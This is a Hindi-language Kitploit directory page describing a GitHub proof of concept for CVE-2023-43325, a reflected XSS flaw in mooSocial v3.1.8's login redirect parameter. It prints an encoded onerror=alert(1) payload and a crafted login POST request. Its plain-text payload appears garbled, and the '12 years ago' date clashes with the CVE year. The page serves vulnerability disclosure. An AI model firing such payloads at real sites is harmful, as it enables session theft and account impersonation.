Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-43325 — mooSocial v3.1.8 उपयोगकर्ता लॉगिन फ़ंक्शन पर क्रॉस-साइट स्क्रिप्टिंग के लिए असुरक्षित है। | Kitploit
उपकरण/GitHubGitHub/ahrixia/cve-2023-43325
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubahrixia/cve-2023-43325

CVE-2023-43325

mooSocial v3.1.8 उपयोगकर्ता लॉगिन फ़ंक्शन पर क्रॉस-साइट स्क्रिप्टिंग के लिए असुरक्षित है।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

mooSocial: XSS (CVE-2023-43325)

mooSocial v3.1.8 के उपयोगकर्ता लॉगिन फ़ंक्शन में data[redirect_url] पैरामीटर में एक परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS) भेद्यता मौजूद है, जो हमलावरों को उपयोगकर्ता के सत्र कुकीज़ चुराने और एक क्राफ्टेड URL के माध्यम से उनके खाते का प्रतिरूपण करने की अनुमति देती है।

भेद्य पैरामीटर: data[redirect_url]

शोषण - प्रूफ ऑफ कॉन्सेप्ट (POC)

परावर्तित क्रॉस-साइट स्क्रिप्टिंग (XSS)

root@kitploit:~
Payload : test">test 
Payload (Base64 encoded) : dGVzdCI+PGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q=
Final Payload (Base64+Url encoded): dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d

POST अनुरोध /moosocial/users/login पर (केवल POST अनुरोध डेटा):

root@kitploit:~
[_method=POST&data%5Bredirect_url%5D=dGVzdCI%2bPGltZyBzcmM9YSBvbmVycm9yPWFsZXJ0KDEpPnRlc3Q%3d%3d&data%5BUser%5D%5Bid%5D=&data%5BUser%5D%5Bemail%5D=admin%40localhost.com&data%5BUser%5D%5Bpassword%5D=pas[redacted]&data%5Bremember%5D=0]

स्क्रीनशॉट

image

टूल डाउनलोड करें